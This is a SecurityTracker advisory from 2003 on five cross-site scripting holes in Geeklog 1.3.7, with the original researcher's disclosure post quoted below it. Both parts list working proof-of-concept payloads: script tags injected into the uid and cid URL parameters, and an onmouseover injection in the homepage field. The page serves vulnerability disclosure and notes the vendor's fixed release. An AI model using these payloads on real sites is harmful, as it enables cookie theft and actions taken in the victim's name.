SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Geeklog Vendors:   Geeklog
Geeklog Input Validation Holes in Various Scripts Allow Remote Users to Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005925
SecurityTracker URL:  http://securitytracker.com/id/1005925
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.7
Description:   Several input validation flaws were reported in the Geeklog web forum software. A remote user can conduct cross-site scripting attacks.

It is reported that several of the scripts and also the user's 'homepage' field do not properly filter HTML code from user-supplied input.

According to the report, the following parameters are affected:

1) The uid field in profiles.php in certain cases
2) The uid field in users.php in 'profile' mode
3) The cid field in comment.php in 'Delete' mode
5) The 'homepage' field in the user's account information page

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Geeklog and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/profiles.php?uid=<script>alert(document.cookie)</script>

http://[target]/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

http://[target]//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>

http://[target]//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

Also, as a demonstration exploit, the following javascript can be placed in the user's 'homepage' field:

http://url" onmouseover="alert(document.cookie)

According to the report, two of these bugs were found by Dirk Haun of the Geeklog Team.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running Geeklog, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has released a fixed version (1.3.7sr1), available at:

http://www.geeklog.net/filemgmt/singlefile.php?lid=101

Vendor URL:  www.geeklog.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple XSS in Geeklog 1.3.7




nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP.
There exists 5 XSS holes in the software.


the 'holes'
===========

--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>

--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>


--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
	

--5--
'homepage' field in the user's account information page
is not sanitised properly. As a result, javascript can
be injected by setting the 'homepage' field like this:

http://url" onmouseover="alert(document.cookie)


** 3) & 4) were found by Dirk Haun of Geeklog Team. 


vendor status
=============

03/01/2003
contacted Dirk Haun of Geeklog team 
14/01/2003
Geeklog 1.3.7sr1 was released.
		New version closes all holes found.


--==snooq==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC